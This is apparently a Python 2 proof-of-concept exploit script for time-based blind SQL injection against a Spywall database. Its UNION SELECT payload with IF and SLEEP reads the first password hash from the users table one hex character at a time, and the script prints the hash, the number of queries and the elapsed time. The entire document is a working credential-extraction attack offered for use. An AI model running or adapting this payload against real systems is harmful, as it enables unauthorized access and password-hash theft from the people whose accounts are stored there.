#!/usr/bin/python # @_Kc57 # Blind SQLi POC # Dumps out the first available hash in the users table of spywall_db
import urllib import time from time import sleep
timing='2.5' checks = 0
def check_char(i, pos): global timimg global checks checks += 1 url = ' union select 1,2, IF (%s=conv(mid((select password from users),%s,1),16,10),SLEEP(%s),null);--' % (i,pos,timing) start = time.time() urllib.urlopen(url) end = time.time() howlong = end-start return howlong
def check_pos(pos):
for m in range(0,16): output = check_char(m, pos) print "[*] Character %s - Took %s seconds" % (hex(m)[2:],output) if output > 2: return hex(m)[2:]
md5 = '' start = time.time() for y in range(1,33): print "Checking position %s" % (y) md5 += check_pos(y) print md5 end = time.time() howlong = end-start
print "1st hash:%s" % (md5) print "Found in %s queries" % (checks) print "Found in %s" %(howlong)